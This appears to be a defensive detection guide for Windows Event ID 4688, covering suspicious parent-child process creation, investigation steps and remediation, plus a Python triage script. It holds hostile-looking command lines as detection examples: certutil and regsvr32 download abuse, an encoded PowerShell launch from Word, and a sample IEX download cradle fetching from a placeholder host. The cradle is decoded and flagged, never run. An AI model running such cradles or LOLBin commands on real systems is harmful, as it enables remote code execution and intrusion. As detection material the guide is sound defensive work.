EventPeeker

Suspicious Process Creation — Abnormal Parent-Child Relationships

Event ID 4688 logs every process creation on Windows when process auditing is enabled. Attackers abuse this by launching malicious binaries from unexpected parent processes, unusual paths, or with encoded command lines — hiding attack activity among thousands of legitimate process events.

Severity

High

ATT&CK Tactic

Execution

Common attacker usage

  • Launching shells (cmd.exe, powershell.exe) from uncommon parents (Word, Excel, browsers, Java)
  • Executing LOLBins (certutil, mshta, regsvr32) with encoded payloads
  • Spawning processes from temp folders, AppData, or user-writable paths
  • Using renamed system binaries to avoid name-based detection
  • Injecting into legitimate processes to hide malicious activity

Investigate immediately if

  • cmd.exe or PowerShell spawned by Microsoft Office, browser, or Java
  • Process running from %TEMP%, %APPDATA%, or a user-writable path
  • Command line contains Base64 strings, -EncodedCommand, or download cradles
  • System binary (svchost, rundll32, regsvr32) running with unusual arguments
  • Process with no command-line arguments or a blank process name

MITRE ATT&CK

Technique

T1059 · Command and Scripting Interpreter

Tactic

Execution

Security Relevance

Process creation monitoring is foundational to endpoint detection. Malware, ransomware loaders, and post-exploitation frameworks consistently leave traces in process creation logs — either through the binary path, the parent process, or the command-line arguments. Without process auditing enabled and 4688 events collected, an attacker can execute freely with limited forensic evidence.

Indicators of Malicious Use

  • Office or browser process spawning cmd.exe, powershell.exe, or wscript.exe
  • Process creation from %TEMP%, %APPDATA%\Roaming, or Downloads folder
  • -EncodedCommand, -enc, or IEX in command line arguments
  • certutil.exe -urlcache or -decode in command line
  • regsvr32.exe /s /u /i:http:// (Squiblydoo technique)
  • Process with a parent PID that is itself short-lived or already terminated

Example Log Entry

Log Name: Security
Source:    Microsoft-Windows-Security-Auditing
Event ID:  4688

A new process has been created.

Creator Subject:
  Account Name:  jsmith
  Account Domain: CORP

Process Information:
  New Process ID:   0x1b8c
  New Process Name: C:\Windows\System32\cmd.exe
  Token Elevation:  Limited

Creator Process Information:
  Creator Process Name: C:\Program Files\Microsoft Office\WINWORD.EXE
  Process Command Line: cmd.exe /c powershell -enc JABjACAAPQ...

Investigation Steps

  1. Identify the parent process — Office, browser, or Java spawning a shell is almost always malicious.
  2. Check the process path — legitimate Windows binaries live in System32 or SysWOW64, not in user profile folders.
  3. Decode any Base64 command-line arguments (use CyberChef or PowerShell's [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(...))).
  4. Trace the process tree — follow the chain from the malicious process back to the initial access point.
  5. Check network connections made by the process (correlate with firewall/proxy logs) — post-exploitation often phones home immediately after execution.
  6. Look for associated 4663 (file access), 4698 (scheduled task), or 7045 (service install) events in the same session.
  7. Capture the file hash and check against VirusTotal or your EDR's threat intel.
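As an added example (not part of the EventPeeker guide), the following Python triage routine parses a 4688 event body like the one above and applies the indicators listed: an Office, browser, or Java parent spawning a shell, a user-writable process path, and an -EncodedCommand argument, which it decodes as UTF-16LE because that is the encoding powershell.exe expects for -enc. The sample event and its encoded blob are constructed here, and the decoded payload is a hypothetical cradle pointing at an .invalid domain.

```python
import base64
import re

# Constructed sample 4688 body modelled on the page's entry (not a real capture); -enc takes
# Base64 of UTF-16LE text, so the blob is generated here instead of being typed by hand.
DECODED_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENC = base64.b64encode(DECODED_CMD.encode("utf-16le")).decode()
SAMPLE_4688 = f"""  Account Name:  jsmith
  New Process Name: C:\\Windows\\System32\\cmd.exe
  Creator Process Name: C:\\Program Files\\Microsoft Office\\WINWORD.EXE
  Process Command Line: cmd.exe /c powershell -enc {ENC}
"""
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_BROWSER_JAVA = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "chrome.exe", "msedge.exe", "firefox.exe", "java.exe", "javaw.exe"}
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|Downloads)\\", re.I)
# Common spellings of -EncodedCommand, followed by the Base64 token it takes.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
CRADLE = re.compile(r"(?i)\bIEX\b|Invoke-Expression|Download(?:String|File)")


def parse_4688(text):
    """Flatten the 'Key: value' lines of a 4688 event body into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([^:]+):\s*(.*)$", line)
        if m and m.group(2):
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when the flag is absent."""
    m = ENC_FLAG.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16le", "replace") if m else None


def triage_4688(text):
    """Apply the guide's indicators to one event and return the indicators hit."""
    f = parse_4688(text)
    child, parent = f.get("New Process Name", ""), f.get("Creator Process Name", "")
    cbase, pbase = (p.rsplit("\\", 1)[-1].lower() for p in (child, parent))
    hits = []
    if cbase in SHELLS and pbase in OFFICE_BROWSER_JAVA:
        hits.append(f"shell {cbase} spawned by {pbase}")
    if USER_WRITABLE.search(child):
        hits.append(f"process running from user-writable path: {child}")
    decoded = decode_encoded_command(f.get("Process Command Line", ""))
    if decoded is not None:
        hits.append(f"encoded command line decodes to: {decoded}")
        if CRADLE.search(decoded):
            hits.append("decoded payload contains IEX / download cradle")
    return hits
```

Run `triage_4688(SAMPLE_4688)` to see the parent-child, encoded-command, and cradle indicators fire on the sample; a benign svchost.exe launched by services.exe returns an empty list.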

Common False Positives

  • Legitimate software update agents spawning cmd.exe or PowerShell
  • IT management tools (SCCM, PDQ, Ansible) running scripts via cmd.exe
  • Developer tools building or testing software from IDEs
  • Some installer packages spawn cmd.exe for post-installation steps

Remediation

  • Enable process creation auditing: Computer Configuration → Audit Policy → Detailed Tracking → Audit Process Creation.
  • Enable command-line auditing: Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events.
  • Isolate the affected host and capture a memory image before removing it from the network.
  • Review the user's recent activity (email, web browsing) to identify the initial access vector.
  • Block identified malicious hashes in your EDR and AV platforms.
  • Consider deploying Attack Surface Reduction (ASR) rules to block Office from spawning child processes.

Related Event IDs

4689 · Process terminated — pair with 4688 to track process lifetime
4663 · Object access — file access by the suspicious process
4698 · Scheduled task created — process may install persistence
4104 · PowerShell script block logging — content of any scripts executed
